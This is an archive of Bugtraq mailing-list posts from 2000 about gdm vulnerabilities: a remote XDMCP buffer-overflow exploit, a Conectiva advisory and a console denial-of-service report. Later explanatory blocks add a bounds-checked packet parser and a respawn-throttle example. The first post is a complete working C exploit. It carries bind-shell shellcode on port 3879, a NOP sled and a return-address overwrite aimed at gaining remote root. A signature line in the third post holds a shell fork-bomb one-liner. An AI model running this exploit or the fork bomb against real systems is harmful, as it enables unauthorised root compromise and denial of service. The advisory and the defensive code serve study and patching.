5161744 2000-06-05  04:24  /162 lines/ Postmaster
Recipient: Bugtraq (import) <11156>
Subject: gdm exploit
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300
Message-ID:  <002301bfc82d$41422280$0200a8c0@ppkcbusiness.de>
Date:         Sun, 28 May 2000 00:45:27 +0200
Reply-To: abraxas@sekure.de
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: abraxas@sekure.de
Organization: abraxas
To: BUGTRAQ@SECURITYFOCUS.COM

/*
 *             gdm (xdmcp) exploit
 *         written 05/2000 by AbraxaS
 *
 *     abraxas@sekure.de && www.sekure.de
 *
 *
 * Tested on:  SuSE 6.2 / gdm-2.0beta1-4,
 *           RedHat 6.2 / gdm-2.0beta2
 *
 * Offsets: Worked with offsets between 0 and 300
 *
 * Usage: gdmexpl [target] [offset]
 *
 * Note: Just a proof of concept.
 *
 * Greetings to: dies, grue, lamagra & (silly) peak
 */


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>

#define NOP 0x90

/* lammys bind shell code / binds a shell to port 3879 */
char code[]=
"\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"
"\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"
"\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"
"\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"
"\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"
"\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75"
"\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"
"\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh";


/* resolve a dotted quad or a hostname to a network-order IPv4 address */
uint32_t resolve (char *denise)
{
  struct hostent *info;
  uint32_t ip;

  if ((ip=inet_addr(denise))==INADDR_NONE)
  {
    if ((info=gethostbyname(denise))==0)
    {
      printf("Couldn't resolve [%s]\n", denise);
      exit(0);
    }
    memcpy(&ip, (info->h_addr), 4);
  }
  return (ip);
}


int main (int argc, char **argv)
{
  int nadine;
  uint16_t blah[6];
  char buffy[1400]; /* you might make this buffer bigger to increase the
                       probability to hit the right addy. making the
                       buffer too big could destroy the code though */
  uint32_t addy;
  struct sockaddr_in stephanie;
  char big_buffy[sizeof(buffy)+12];

  if (argc < 3)
  {
    printf("\nGDM 2.0betaX exploit by AbraxaS (abraxas@sekure.de)"
           "\nUsage: %s [target] [offset]\n", argv[0]);
    exit(0);
  }

  addy = 0xbffff8c0-atoi(argv[2]);

  memset(&stephanie, 0, sizeof(stephanie));
  stephanie.sin_family = AF_INET;
  stephanie.sin_port = htons (177);       /* XDMCP listens on udp/177 */
  stephanie.sin_addr.s_addr = resolve(argv[1]);
  nadine = socket (AF_INET, SOCK_DGRAM, 0);
  if (nadine < 0)
  {
    perror("Socket"); exit(0);
  }

  if (connect(nadine,(struct sockaddr *)&stephanie,sizeof(stephanie))<0)
  {
    perror("Connect"); exit(0);
  }

  /* filling buffer.buffy with NOPs */
  memset(buffy, NOP, sizeof(buffy));
  /* cleaning buffer.big_buffy */
  memset(big_buffy, 0, sizeof(big_buffy));

  /*
   *   creating XDMCP header
   */

  /* XDM_PROTOCOL_VERSION */
  blah[0] = htons(1);
  /* opcode "FORWARD_QUERY" */
  blah[1] = htons(4);
  /* length (checksum)*/
  blah[2] = htons(5+sizeof(buffy)); /* see checksum algorithm */
  /* length of display buffer */
  blah[3] = htons(sizeof(buffy));
  /* display port */
  blah[4] = htons(0);
  /* authlist */
  blah[5] = htons(0);

  /* 16-bit stores at fixed offsets; uint16_t keeps them two bytes wide
     on every ABI, unlike the original short/long casts on 64-bit hosts */
  *(uint16_t *)&big_buffy[0]=blah[0];
  *(uint16_t *)&big_buffy[2]=blah[1];
  *(uint16_t *)&big_buffy[4]=blah[2];
  *(uint16_t *)&big_buffy[6]=blah[3];
  *(uint16_t *)&big_buffy[sizeof(buffy)+8]=blah[4];
  *(uint16_t *)&big_buffy[sizeof(buffy)+10]=blah[5];


  /* writing shellcode at the very end of the NOP sled */
  memcpy(buffy+sizeof(buffy)-strlen(code), code, strlen(code));

  /* fixing some stuff */
  *(uint32_t *)&buffy[0] = 0x0100007f; /* source address (127.0.0.1), not necessary */
  *(uint32_t *)&buffy[4] = 0x00000000; /* cleaning clnt_authlist */
  *(uint32_t *)&buffy[8] = 0x00000000;

  /* writing own RET address */
  *(uint32_t *)&buffy[32]=addy;

  /* copying buffy into big_buffy, right after the 8-byte header */
  memcpy(big_buffy+8, buffy, sizeof(buffy));

  /* sending big_buffy */
  write(nadine, big_buffy, sizeof(big_buffy));

  printf("\nConnect to %s, port 3879 now.", argv[1]);
  printf("\nBut behave :) --abraxas\n");

  close(nadine);

  return 0;
}
(5161744) ------------------------------------------
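The packet the exploit builds is a FORWARD_QUERY whose "client address" ARRAY8 is 1400 bytes long, far more than any address. The following is an added example, not code from the post, from gdm, or from any vendor fix: a parser for that packet that checks every length field against the bytes actually received and against a fixed cap before copying, which is the check an overflow of this kind needs. The wire layout (version, opcode, length, then ARRAY8 address, ARRAY8 port, ARRAYofARRAY8 authentication names) is taken from the exploit's header construction and the XDMCP spec; the caps (MAX_ADDR_LEN and friends) are this example's own assumptions, not gdm's.

```c
/* Added example (not from the Bugtraq post or from gdm): a bounds-checked
 * parser for the XDMCP FORWARD_QUERY packet the exploit above sends.
 * Layout assumed from the exploit and the XDMCP spec:
 *   CARD16 version, CARD16 opcode, CARD16 length,
 *   ARRAY8 client_address (CARD16 len + bytes),
 *   ARRAY8 client_port    (CARD16 len + bytes),
 *   ARRAYofARRAY8 auth_names (CARD8 count, then one ARRAY8 each). */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define XDMCP_VERSION       1
#define XDMCP_FORWARD_QUERY 4
#define MAX_ADDR_LEN        16   /* assumption: room for IPv4 or IPv6 */
#define MAX_PORT_LEN        2
#define MAX_AUTH_NAMES      8
#define MAX_AUTH_NAME_LEN   64

struct forward_query {
    uint8_t  addr[MAX_ADDR_LEN]; uint16_t addr_len;
    uint8_t  port[MAX_PORT_LEN]; uint16_t port_len;
    uint8_t  nauth;
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] << 8 | p[1]); }

/* Read one ARRAY8 at *off into dst (capacity cap). Returns 0 on success,
 * -1 if the declared length runs past the packet or exceeds cap. */
static int read_array8(const uint8_t *pkt, size_t len, size_t *off,
                       uint8_t *dst, uint16_t cap, uint16_t *out_len)
{
    if (len - *off < 2) return -1;
    uint16_t n = rd16(pkt + *off);
    *off += 2;
    if (n > cap || n > len - *off) return -1;   /* the check the overflow needs */
    memcpy(dst, pkt + *off, n);
    *off += n;
    *out_len = n;
    return 0;
}

/* Returns 0 and fills *q on success; a negative code names the failing field. */
int parse_forward_query(const uint8_t *pkt, size_t len, struct forward_query *q)
{
    size_t off = 6;
    if (len < 6) return -1;
    if (rd16(pkt) != XDMCP_VERSION) return -2;
    if (rd16(pkt + 2) != XDMCP_FORWARD_QUERY) return -3;
    if (rd16(pkt + 4) != len - 6) return -4;      /* declared length must match */
    memset(q, 0, sizeof *q);
    if (read_array8(pkt, len, &off, q->addr, MAX_ADDR_LEN, &q->addr_len)) return -5;
    if (read_array8(pkt, len, &off, q->port, MAX_PORT_LEN, &q->port_len)) return -6;
    if (len - off < 1) return -7;
    q->nauth = pkt[off++];
    if (q->nauth > MAX_AUTH_NAMES) return -7;
    for (unsigned i = 0; i < q->nauth; i++) {
        uint8_t name[MAX_AUTH_NAME_LEN]; uint16_t nlen;
        if (read_array8(pkt, len, &off, name, MAX_AUTH_NAME_LEN, &nlen)) return -8;
    }
    return off == len ? 0 : -9;                   /* no trailing bytes allowed */
}

/* Build a FORWARD_QUERY whose client address is addr_len bytes of fill, the
 * way the exploit does (length field = 5 + addr_len, empty port, no auth
 * names). Returns the packet size, or 0 if out cannot hold it. */
size_t build_forward_query(uint8_t *out, size_t cap, uint16_t addr_len, uint8_t fill)
{
    size_t total = 6 + 2 + addr_len + 2 + 1, off = 0;
    if (cap < total) return 0;
    uint16_t plen = (uint16_t)(5 + addr_len);
    out[off++] = 0; out[off++] = XDMCP_VERSION;
    out[off++] = 0; out[off++] = XDMCP_FORWARD_QUERY;
    out[off++] = (uint8_t)(plen >> 8);     out[off++] = (uint8_t)(plen & 0xff);
    out[off++] = (uint8_t)(addr_len >> 8); out[off++] = (uint8_t)(addr_len & 0xff);
    memset(out + off, fill, addr_len); off += addr_len;
    out[off++] = 0; out[off++] = 0;   /* empty client port */
    out[off++] = 0;                   /* zero authentication names */
    return off;
}

/* Constructed packets only; returns 0 if every case behaves as expected,
 * otherwise the number of the first failing case. */
int xdmcp_selfcheck(void)
{
    static uint8_t pkt[2048];
    struct forward_query q;
    size_t n = build_forward_query(pkt, sizeof pkt, 4, 0x7f);   /* sane 4-byte address */
    if (n != 15 || parse_forward_query(pkt, n, &q) != 0) return 1;
    if (q.addr_len != 4 || q.addr[0] != 0x7f || q.port_len != 0 || q.nauth != 0) return 2;
    pkt[7] = 100;                                    /* lie about the address length */
    if (parse_forward_query(pkt, n, &q) != -5) return 3;
    pkt[7] = 4;
    if (parse_forward_query(pkt, n - 1, &q) != -4) return 4;     /* truncated datagram */
    n = build_forward_query(pkt, sizeof pkt, 1400, 0x90);        /* exploit-sized sled */
    if (n != 1411 || parse_forward_query(pkt, n, &q) != -5) return 5;
    return 0;
}

int main(void)
{
    int rc = xdmcp_selfcheck();
    printf("xdmcp parser selfcheck: %s (%d)\n", rc ? "FAIL" : "ok", rc);
    return rc;
}
```

Note that the exploit's own datagram declares a length of 5+1400 but carries 1406 bytes after the header (its authlist field is written as two bytes); a parser that insists the length field match the datagram, as this one does, rejects it at the header before ever looking at the address.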

5174741 2000-06-08  10:58  /62 lines/ Postmaster
Recipient: Bugtraq (import) <11198>
Subject: Conectiva Linux Security Announcement - gdm
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: bugtraq@securityfocus.com
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Message-ID:  <20000607104102.K4764@conectiva.com.br>
Date:         Wed, 7 Jun 2000 10:41:02 -0300
Reply-To: Sergio Bruder <bruder@CONECTIVA.COM.BR>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Sergio Bruder <bruder@CONECTIVA.COM.BR>
X-To:         lwn@lwn.net, bos@sekure.org
To: BUGTRAQ@SECURITYFOCUS.COM

CONECTIVA LINUX SECURITY ANNOUNCEMENT


PACKAGE: gdm


SUMMARY				: Remote buffer overflow
DATE				: 2000-JUN-06
AFFECTED CONECTIVA VERSIONS	: 4.1, 4.2 and 5.0


DESCRIPTION
The gdm program is one of the graphical login choices available
for Conectiva Linux users. A serious vulnerability has been found
in this program during the XDMCP protocol processing that could
lead to remote root compromise.
In order to exploit this vulnerability, the XDMCP option has to
be explicitly enabled in /etc/X11/gdm/gdm.conf. All Conectiva
Linux versions ship with this option DISABLED by default.


SOLUTION
If you need to use XDMCP, then you MUST upgrade the gdm program
to the latest release following the links below. If XDMCP is
disabled in /etc/X11/gdm/gdm.conf, then this vulnerability cannot
be exploited.


DIRECT DOWNLOAD LINKS TO UPDATED PACKAGES:
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/i386/gdm-2.0beta4-2cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/i386/gdm-2.0beta4-2cl.i386.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/i386/gdm-2.0beta4-2cl.i386.rpm


SOURCE RPM PACKAGES ARE ALSO AVAILABLE:
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.1/SRPMS/gdm-2.0beta4-2cl.src.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/4.2/SRPMS/gdm-2.0beta4-2cl.src.rpm
ftp://ftp.conectiva.com.br/pub/conectiva/atualizacoes/5.0/SRPMS/gdm-2.0beta4-2cl.src.rpm


All packages are signed with Conectiva's PGP key. The key can be
obtained at http://www.conectiva.com.br/conectiva/contato.html

Information on how to install and/or update packages, and mirror
sites, can be found at http://www.conectiva.com.br/atualizacoes

----------------------------------------------------------------------
subscribe: atualizacoes-anuncio-subscribe@bazar.conectiva.com.br
unsubscribe: atualizacoes-anuncio-unsubscribe@bazar.conectiva.com.br
(5174741) ------------------------------------------(reflowed)

5195550 2000-06-14  20:58  /38 lines/ Postmaster
Recipient: Bugtraq (import) <11278>
Subject: xfs + gdm allow DoS of console
------------------------------------------------------------
Approved-By: aleph1@SECURITYFOCUS.COM
Delivered-To: bugtraq@lists.securityfocus.com
Delivered-To: BUGTRAQ@SECURITYFOCUS.COM
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
X-Priority: 3
X-MSMail-Priority: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2919.6600
Message-ID:  <00e901bfd51a$335ef3b0$1000000a@theytalk.com>
Date:         Tue, 13 Jun 2000 10:31:49 +0100
Reply-To: Mike Leonhard <mike@THEYTALK.COM>
Sender: Bugtraq List <BUGTRAQ@SECURITYFOCUS.COM>
From: Mike Leonhard <mike@THEYTALK.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by samantha.lysator.liu.se id UAA03020

RedHat 6.2 further extends the xfs problem with its buggy gdm.  gdm
apparently ignores the --nodaemon option specified to it in inittab.
If the X server fails to load for whatever reason, gdm will
immediately reload it.  This causes the console to become unusable -
caught in a loop with the screen flashing every 2 seconds as the X
server tries to load.  On a machine with no network login capability
the only way out of this situation is to reboot the system by
pressing CTRL-ALT-DEL on the keyboard.  If gdm would exit when the X
server quits, then init would reload it in a safe manner - stopping
for 5 min if gdm is reloaded (I believe it is) 10 times in one minute.

RedHat's updated gdm rpm as of last week did not resolve this issue.
I wonder if it was a good idea to move the 'fixed' font into xfs.  I
have had good experiences with xfstt, but I have always had my normal
X fonts loaded directly from disk.

Mike_L
mike@theytalk.com


----- Original Message ----- 
From: "Michal Zalewski" <lcamtuf@TPI.PL>
To: <BUGTRAQ@SECURITYFOCUS.COM>
Sent: Sunday, April 16, 2000 2:31 PM
Subject: xfs

Due to improper input validation (NULL pointer occurs on strcpy()), any
user may crash X fontserver under RedHat 6.x, causing effective DoS for
whole X server :)
_______________________________________________________
Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security]
[http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};:
=-----=> God is real, unless declared integer. <=-----=
(5195550) ------------------------------------------(reflowed)
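The safe behaviour the post credits init with is a respawn throttle: let a service be restarted a bounded number of times inside a window, then refuse to start it for a hold-off period instead of looping. The block below is an added example of that mechanism, written for this page; it is not init's, sysvinit's or gdm's code, and the thresholds (10 starts in 60 s, then 5 minutes off) are the figures the post states, not values verified against any init implementation. The self-check simulates the post's scenario, an X server that dies every 2 seconds, next to a service that only fails every 10 seconds and is never throttled.

```c
/* Added example (not init's or gdm's code): a respawn throttle of the kind
 * the post describes. Thresholds are the post's stated numbers, assumed here. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define RESPAWN_MAX    10     /* starts allowed ...                         */
#define RESPAWN_WINDOW 60     /* ... within this many seconds ...           */
#define RESPAWN_HOLD   300    /* ... before the service is parked this long */

struct respawn_state {
    int64_t stamps[RESPAWN_MAX];   /* ring of the most recent start times   */
    int     count;                 /* valid entries in stamps               */
    int     head;                  /* index of the oldest entry             */
    int64_t hold_until;            /* 0 = not parked                        */
};

void respawn_init(struct respawn_state *s) { memset(s, 0, sizeof *s); }

/* Called when the service has exited and wants restarting at time now (s).
 * Returns 1 if it may be started (and records the start), 0 if throttled. */
int respawn_allowed(struct respawn_state *s, int64_t now)
{
    if (s->hold_until) {
        if (now < s->hold_until) return 0;          /* still parked */
        s->hold_until = 0; s->count = 0; s->head = 0;
    }
    if (s->count == RESPAWN_MAX) {
        int64_t oldest = s->stamps[s->head];
        if (now - oldest < RESPAWN_WINDOW) {         /* RESPAWN_MAX+1st start in window */
            s->hold_until = now + RESPAWN_HOLD;
            return 0;
        }
    }
    s->stamps[(s->head + s->count) % RESPAWN_MAX] = now;
    if (s->count < RESPAWN_MAX) s->count++;
    else s->head = (s->head + 1) % RESPAWN_MAX;      /* overwrote the oldest slot */
    return 1;
}

/* Simulated clocks only; returns 0 if every case behaves as expected,
 * otherwise the number of the first failing case. */
int respawn_selfcheck(void)
{
    struct respawn_state s;
    int64_t t;
    respawn_init(&s);
    for (t = 0; t < 20; t += 2)                     /* X dies every 2 s: 10 starts pass */
        if (!respawn_allowed(&s, t)) return 1;
    if (respawn_allowed(&s, 20)) return 2;          /* 11th start inside 60 s: parked */
    if (respawn_allowed(&s, 319)) return 3;         /* still inside the 5 min hold */
    if (!respawn_allowed(&s, 320)) return 4;        /* hold expired, may start again */
    respawn_init(&s);
    for (t = 0; t <= 200; t += 10)                  /* failing every 10 s never trips it */
        if (!respawn_allowed(&s, t)) return 5;
    return 0;
}

int main(void)
{
    int rc = respawn_selfcheck();
    printf("respawn throttle selfcheck: %s (%d)\n", rc ? "FAIL" : "ok", rc);
    return rc;
}
```

The point of keeping the ring of start times rather than a plain counter is that a service which fails occasionally keeps being restarted indefinitely, while a tight crash loop like the one in the post is stopped after the window fills; a daemon that re-executes its own child internally, as the post says gdm did, bypasses this entirely because init never sees an exit.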